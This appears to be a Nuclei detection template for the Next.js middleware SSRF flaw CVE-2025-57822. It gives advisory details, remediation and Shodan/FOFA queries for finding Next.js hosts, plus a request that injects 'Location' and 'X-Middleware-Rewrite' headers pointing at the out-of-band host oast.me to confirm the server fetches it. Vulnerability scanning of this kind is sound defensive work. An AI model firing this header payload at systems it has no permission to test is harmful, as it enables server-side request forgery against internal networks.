id: CVE-2025-57822 info: name: Next.js Middleware - Server-Side Request Forgery author: prdngr,nicolas-latacora severity: medium description: | In Next.js prior to versions 14.2.32 and 15.4.7, when request headerswere insecurely passed to NextResponse.next(), an attacker could exploit this behavior to perform Server-Side Request Forgery (SSRF) attacks. impact: | Attackers can manipulate request headers to perform SSRF attacks by forcing the server to make requests to arbitrary internal or external URLs when middleware passes headers unsafely. remediation: | Upgrade Next.js to version 14.2.32, 15.4.7, or later that properly validates and sanitizes request headers in NextResponse.next(). reference: - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f - https://vercel.com/changelog/cve-2025-57822 - https://nvd.nist.gov/vuln/detail/CVE-2025-57822 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 6.5 cve-id: CVE-2025-57822 epss-score: 0.07815 epss-percentile: 0.92116 cwe-id: CWE-918 metadata: verified: true vendor: vercel product: next.js shodan-query: - cpe:"cpe:2.3:a:zeit:next.js" - http.html:"/_next/static" fofa-query: - body="/_next/static" tags: cve,cve2025,ssrf,nextjs,oast,oob,vuln variables: cache-buster: "{{rand_text_alpha(10)}}" flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" redirects: true max-redirects: 3 matchers: - type: word part: body words: - "_next/static" internal: true - method: GET path: - "{{BaseURL}}/?cb={{cache-buster}}" headers: Location: "https://oast.me" X-Middleware-Rewrite: "https://oast.me" host-redirects: true max-redirects: 3 matchers: - type: word part: body words: - "

Interactsh Server

" # digest: 4a0a004730450221008482c26cc1717442d1cf376d309e3b7e4675cf2a42eefb59173d87073b6fdd84022004e2b3d239e9ce63c8b87751761f08cb4630e5416b2bcf621bbcd8b889bf7cb5:922c64590222798bb761d5b6d8e72950